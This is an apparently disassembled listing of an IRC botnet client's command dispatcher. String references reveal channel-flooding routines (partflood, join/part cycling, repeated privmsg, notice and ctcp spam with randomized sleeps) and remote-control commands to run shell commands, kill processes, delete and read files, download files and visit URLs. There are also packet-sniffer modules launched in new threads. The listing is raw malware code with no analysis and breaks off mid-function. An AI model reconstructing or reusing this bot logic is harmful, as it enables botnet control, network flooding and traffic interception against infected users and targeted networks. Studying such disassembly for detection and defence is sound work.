mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
jz short loc_4057B3
push offset asc_42FE58 ; " "
push offset a_ ; "_"
push eax ; Dest
call sub_41AB7D
push eax ; Source
lea eax, [ebp+4Ch+var_50FC]
push eax ; Dest
call _strcpy
lea eax, [ebp+4Ch+var_50FC]
push eax
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 28h
loc_4057B3: ; CODE XREF: sub_40274D+3014�j
; sub_40274D+301C�j
push [ebp+4Ch+var_8] ; Str2
push offset aCt ; "ct"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_405816
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
jz short loc_405816
push offset asc_42FE58 ; " "
push offset a_ ; "_"
push eax ; Dest
call sub_41AB7D
push eax ; Source
lea eax, [ebp+4Ch+var_4BF8]
push eax ; Dest
call _strcpy
lea eax, [ebp+4Ch+var_4BF8]
push eax
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPrivmsgS ; "privmsg %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 28h
loc_405816: ; CODE XREF: sub_40274D+3077�j
; sub_40274D+307F�j
push [ebp+4Ch+var_8] ; Str2
push offset aNt ; "nt"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_405879
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
jz short loc_405879
push offset asc_42FE58 ; " "
push offset a_ ; "_"
push eax ; Dest
call sub_41AB7D
push eax ; Source
lea eax, [ebp+4Ch+var_46F4]
push eax ; Dest
call _strcpy
lea eax, [ebp+4Ch+var_46F4]
push eax
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aNoticeSS_0 ; "notice %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 28h
loc_405879: ; CODE XREF: sub_40274D+30DA�j
; sub_40274D+30E2�j
push [ebp+4Ch+var_8] ; Str2
push offset aMode ; "mode"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4058DC
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
jz short loc_4058DC
push offset asc_42FE58 ; " "
push offset a_ ; "_"
push eax ; Dest
call sub_41AB7D
push eax ; Source
lea eax, [ebp+4Ch+var_4DF8]
push eax ; Dest
call _strcpy
lea eax, [ebp+4Ch+var_4DF8]
push eax
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aModeSS ; "mode %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 28h
loc_4058DC: ; CODE XREF: sub_40274D+313D�j
; sub_40274D+3145�j
push [ebp+4Ch+var_8] ; Str2
push offset aJoin ; "join"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_405918
mov eax, [ebp+esi+4Ch+Format]
cmp eax, ebx
jz short loc_405918
push eax
lea eax, [ebp+4Ch+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 10h
loc_405918: ; CODE XREF: sub_40274D+31A0�j
; sub_40274D+31A8�j
push [ebp+4Ch+var_8] ; Str2
push offset aPart_0 ; "part"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_405954
mov eax, [ebp+esi+4Ch+Format]
cmp eax, ebx
jz short loc_405954
push eax
lea eax, [ebp+4Ch+Dst]
push offset aPartS ; "part %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 10h
loc_405954: ; CODE XREF: sub_40274D+31DC�j
; sub_40274D+31E4�j
push [ebp+4Ch+var_8] ; Str2
push offset aPartflood ; "partflood"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_405995
mov eax, [ebp+esi+4Ch+Format]
cmp eax, ebx
jz short loc_405995
push offset a__p_a_w_a_a__p ; "..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a."...
push eax
lea eax, [ebp+4Ch+Dst]
push offset aPartSS ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
loc_405995: ; CODE XREF: sub_40274D+3218�j
; sub_40274D+3220�j
push [ebp+4Ch+var_8] ; Str2
push offset aPnick ; "pnick"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_405A04
cmp [ebp+esi+4Ch+Format], ebx
jz short loc_405A04
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+4Ch+var_1810]
push edx
push [ebp+esi+4Ch+Format]
push offset aSI ; "%s%i"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+var_1810]
push eax
lea eax, [ebp+4Ch+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 24h
loc_405A04: ; CODE XREF: sub_40274D+3259�j
; sub_40274D+325F�j
push [ebp+4Ch+var_8] ; Str2
push offset aJoinPart ; "join/part"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_405B36
cmp [ebp+esi+4Ch+Format], ebx
jz loc_405B36
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
push offset a__p_a_w_a_a__p ; "..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a."...
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPartSS ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 24h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 10h
call _rand
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset a__p_a_w_a_a__p ; "..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a."...
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPartSS ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 24h
call _rand
cdq
mov ecx, 0C8h
idiv ecx
push edx
call edi ; Sleep
push offset a__p_a_w_a_a__p ; "..P.a.W.a.a..P.a.W.a.a..P.a.W.a.a..P.a."...
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPartSS ; "part %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
loc_405B36: ; CODE XREF: sub_40274D+32C8�j
; sub_40274D+32D2�j
push [ebp+4Ch+var_8] ; Str2
push offset aDcc ; "dcc"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_405BC6
cmp [ebp+esi+4Ch+Format], ebx
jz short loc_405BC6
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call _rand
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+4Ch+Dst]
push edx
push [ebp+esi+4Ch+Format]
push offset aPrivmsgS_0 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 24h
loc_405BC6: ; CODE XREF: sub_40274D+33FA�j
; sub_40274D+3400�j
push [ebp+4Ch+var_8] ; Str2
push offset aNick_0 ; "nick"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_405CC0
mov eax, [ebp+esi+4Ch+Format]
cmp eax, ebx
jz loc_405CC0
push eax
lea eax, [ebp+4Ch+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
lea eax, [ebp+4Ch+var_4C4]
push eax ; Dest
call sub_41A293
lea eax, [ebp+4Ch+var_4C4]
push eax
lea eax, [ebp+4Ch+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 24h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
lea eax, [ebp+4Ch+var_4C4]
push eax ; Dest
call sub_41A293
lea eax, [ebp+4Ch+var_4C4]
push eax
lea eax, [ebp+4Ch+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
call _rand
cdq
mov ecx, 1F4h
idiv ecx
push edx
call edi ; Sleep
lea eax, [ebp+4Ch+var_4C4]
push eax ; Dest
call sub_41A293
lea eax, [ebp+4Ch+var_4C4]
push eax
lea eax, [ebp+4Ch+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
loc_405CC0: ; CODE XREF: sub_40274D+348A�j
; sub_40274D+3496�j
push [ebp+4Ch+var_8] ; Str2
push offset aChgnick ; "chgnick"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_405D06
lea eax, [ebp+4Ch+var_17D8]
push eax ; Dest
call sub_41A293
lea eax, [ebp+4Ch+var_17D8]
push eax
lea eax, [ebp+4Ch+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
loc_405D06: ; CODE XREF: sub_40274D+3584�j
push [ebp+4Ch+var_8] ; Str2
push offset aMsg ; "msg"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_405DE3
cmp [ebp+esi+4Ch+Format], ebx
jz loc_405DE3
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
push offset a__p_a_w_a_a__0 ; "..P.a.W.a.a..P.a.W.a.a.P.a.W.a.a..P.a.W"...
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 24h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push offset a__p_a_w_a_a__0 ; "..P.a.W.a.a..P.a.W.a.a.P.a.W.a.a..P.a.W"...
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
call _rand
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset a__p_a_w_a_a__0 ; "..P.a.W.a.a..P.a.W.a.a.P.a.W.a.a..P.a.W"...
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
loc_405DE3: ; CODE XREF: sub_40274D+35CA�j
; sub_40274D+35D4�j
push [ebp+4Ch+var_8] ; Str2
push offset aNotice_0 ; "notice"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_405EC0
cmp [ebp+esi+4Ch+Format], ebx
jz loc_405EC0
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
push offset a__p_a_w_a_a__0 ; "..P.a.W.a.a..P.a.W.a.a.P.a.W.a.a..P.a.W"...
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 24h
call _rand
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push offset a__p_a_w_a_a__0 ; "..P.a.W.a.a..P.a.W.a.a.P.a.W.a.a..P.a.W"...
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
call _rand
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset a__p_a_w_a_a__0 ; "..P.a.W.a.a..P.a.W.a.a.P.a.W.a.a..P.a.W"...
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
loc_405EC0: ; CODE XREF: sub_40274D+36A7�j
; sub_40274D+36B1�j
push [ebp+4Ch+var_8] ; Str2
push offset aCtcp ; "ctcp"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_405FC2
cmp [ebp+esi+4Ch+Format], ebx
jz loc_405FC2
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPrivmsgS_1 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 20h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPrivmsgS_2 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPrivmsgS_3 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 10h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPrivmsgS_3 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 10h
loc_405FC2: ; CODE XREF: sub_40274D+3784�j
; sub_40274D+378E�j
push [ebp+4Ch+var_8] ; Str2
push offset aMix ; "mix"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_4060D3
cmp [ebp+esi+4Ch+Format], ebx
jz loc_4060D3
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPrivmsgS_1 ; "PRIVMSG %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 20h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset a__p_a_w_a_a__0 ; "..P.a.W.a.a..P.a.W.a.a.P.a.W.a.a..P.a.W"...
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset a__p_a_w_a_a__0 ; "..P.a.W.a.a..P.a.W.a.a.P.a.W.a.a..P.a.W"...
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aPrivmsgSS_0 ; "PRIVMSG %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
call _rand
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset a__p_a_w_a_a__0 ; "..P.a.W.a.a..P.a.W.a.a.P.a.W.a.a..P.a.W"...
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
loc_4060D3: ; CODE XREF: sub_40274D+3886�j
; sub_40274D+3890�j
push [ebp+4Ch+var_8] ; Str2
push offset aRegister ; "register"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_406113
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
jz short loc_406113
push eax
push [ebp+esi+4Ch+Format]
lea eax, [ebp+4Ch+Dst]
push offset aNickservRegist ; "nickserv register %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call sub_41A24C
add esp, 14h
loc_406113: ; CODE XREF: sub_40274D+3997�j
; sub_40274D+399F�j
push [ebp+4Ch+var_8] ; Str2
push offset Str2 ; "off"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_406CD6
mov edi, offset dword_4DB58C
loc_40612F: ; CODE XREF: sub_40274D+3A01�j
cmp dword ptr [edi-4], 1
jnz short loc_406142
mov eax, [edi]
cmp eax, ebx
jbe short loc_406142
push eax
call dword_444218 ; closesocket
loc_406142: ; CODE XREF: sub_40274D+39E6�j
; sub_40274D+39EC�j
add edi, 210h
cmp edi, offset dword_4E1CAC
jl short loc_40612F
cmp [ebp+4Ch+var_C], ebx
jnz loc_406CD6
push ebx ; int
push [ebp+4Ch+var_4] ; int
push offset unk_42E784 ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
jmp loc_406CD6
; ---------------------------------------------------------------------------
loc_406175: ; CODE XREF: sub_40274D+2F7A�j
mov edi, [ebp+4Ch+var_10]
push edi ; Str2
push offset aNick_0 ; "nick"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409FBE
push edi ; Str2
push offset aN ; "n"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409FBE
push edi ; Str2
push offset aJoin ; "join"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409F95
push edi ; Str2
push offset aJ ; "j"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409F95
push edi ; Str2
push offset aPart_0 ; "part"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409F7B
push edi ; Str2
push offset aPt ; "pt"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409F7B
push edi ; Str2
push offset aRaw ; "raw"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409F45
push edi ; Str2
push offset aR ; "r"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409F45
push edi ; Str2
push offset aKillthread ; "killthread"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409E9F
push edi ; Str2
push offset aK ; "k"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409E9F
push edi ; Str2
push offset aC_quit ; "c_quit"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409DF1
push edi ; Str2
push offset aC_q ; "c_q"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409DF1
push edi ; Str2
push offset aC_rndnick ; "c_rndnick"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409D7C
push edi ; Str2
push offset aC_rn ; "c_rn"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409D7C
push edi ; Str2
push offset aPrefix ; "prefix"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409D63
push edi ; Str2
push offset aPr ; "pr"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409D63
push edi ; Str2
push offset aOpen ; "open"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409D35
push edi ; Str2
push offset aO ; "o"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409D35
push edi ; Str2
push offset aServer_1 ; "server"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409D0C
push edi ; Str2
push offset aSe ; "se"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409D0C
push edi ; Str2
push offset aDns ; "dns"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409CA4
push edi ; Str2
push offset aDn ; "dn"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409CA4
push edi ; Str2
push offset aKillproc ; "killproc"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409C74
push edi ; Str2
push offset aKp ; "kp"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409C74
push edi ; Str2
push offset aKill ; "kill"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409C18
push edi ; Str2
push offset aKi ; "ki"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409C18
push edi ; Str2
push offset aDelete ; "delete"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409BDD
push edi ; Str2
push offset aDel ; "del"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409BDD
push edi ; Str2
push offset aGet_1 ; "get"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409B06
push edi ; Str2
push offset aGt ; "gt"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409B06
push edi ; Str2
push offset aList ; "list"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409AEA
push edi ; Str2
push offset aLi ; "li"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409AEA
push edi ; Str2
push offset aVisit ; "visit"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409A00
push edi ; Str2
push offset aV ; "v"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409A00
push edi ; Str2
push offset aMirccmd ; "mirccmd"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40998D
push edi ; Str2
push offset aMirc ; "mirc"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_40998D
push edi ; Str2
push offset aCmd ; "cmd"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409937
push edi ; Str2
push offset aCm ; "cm"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_409937
push edi ; Str2
push offset aReadfile ; "readfile"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4098AF
push edi ; Str2
push offset aRf ; "rf"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_4098AF
push edi ; Str2
push offset aPsniff ; "psniff"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_406608
push [ebp+4Ch+var_8] ; Str2
push offset aOn ; "on"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_4065CE
push 20h
call sub_40B075
test eax, eax
pop ecx
jle short loc_406502
push offset dword_42E688
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_406502: ; CODE XREF: sub_40274D+3DA9�j
mov eax, [ebp+4Ch+arg_4]
mov esi, [ebp+esi+4Ch+Format]
cmp esi, ebx
mov [ebp+4Ch+var_FF4], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_F6C], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_F68], eax
jnz short loc_40653E
push offset byte_42B633 ; Str2
mov esi, offset a_fast__2 ; "#.fast.#"
push esi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_40653E
mov esi, [ebp+4Ch+Format]
loc_40653E: ; CODE XREF: sub_40274D+3DD6�j
; sub_40274D+3DEC�j
push esi ; Format
lea eax, [ebp+4Ch+var_FF0]
push 80h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+4Ch+Dst]
push offset asc_42E658 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 20h ; int
push eax ; Source
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_F70], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_FF4]
push eax
push offset sub_414ECA
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_F70]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_4065C1
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42E61C
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4065B9: ; CODE XREF: sub_40274D+3E7A�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4065C1: ; CODE XREF: sub_40274D+3E59�j
cmp [ebp+4Ch+var_F64], ebx
jz short loc_4065B9
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_4065CE: ; CODE XREF: sub_40274D+3D99�j
push [ebp+4Ch+var_8] ; Str2
push offset Str2 ; "off"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_40698D
push ebx
push 20h
call sub_40B028
cmp eax, ebx
pop ecx
pop ecx
jle short loc_4065FE
push eax
push offset dword_42E5E0
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4065FE: ; CODE XREF: sub_40274D+3EA4�j
push offset dword_42E5B4
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_406608: ; CODE XREF: sub_40274D+3D82�j
push edi ; Str2
push offset aSniffer ; "sniffer"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_406750
push [ebp+4Ch+var_8] ; Str2
push offset aOn ; "on"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_406716
push 21h
call sub_40B075
test eax, eax
pop ecx
jle short loc_40664A
push offset unk_42E58C
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_40664A: ; CODE XREF: sub_40274D+3EF1�j
mov eax, [ebp+4Ch+arg_4]
mov esi, [ebp+esi+4Ch+Format]
cmp esi, ebx
mov [ebp+4Ch+var_ECC], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_E44], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_E40], eax
jnz short loc_406686
push offset byte_42B633 ; Str2
mov esi, offset a_fast__2 ; "#.fast.#"
push esi ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_406686
mov esi, [ebp+4Ch+Format]
loc_406686: ; CODE XREF: sub_40274D+3F1E�j
; sub_40274D+3F34�j
push esi ; Format
lea eax, [ebp+4Ch+var_EC8]
push 80h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+4Ch+Dst]
push offset asc_42E55C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 21h ; int
push eax ; Source
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_E48], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_ECC]
push eax
push offset sub_41549E
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_E48]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_406709
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42E520
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_406701: ; CODE XREF: sub_40274D+3FC2�j
push 32h
call ds:dword_42B014 ; Sleep
loc_406709: ; CODE XREF: sub_40274D+3FA1�j
cmp [ebp+4Ch+var_E3C], ebx
jz short loc_406701
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_406716: ; CODE XREF: sub_40274D+3EE1�j
push [ebp+4Ch+var_8] ; Str2
push offset Str2 ; "off"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_40698D
push ebx
push 21h
call sub_40B028
cmp eax, ebx
pop ecx
pop ecx
jle short loc_406746
push eax
push offset unk_42E4E0
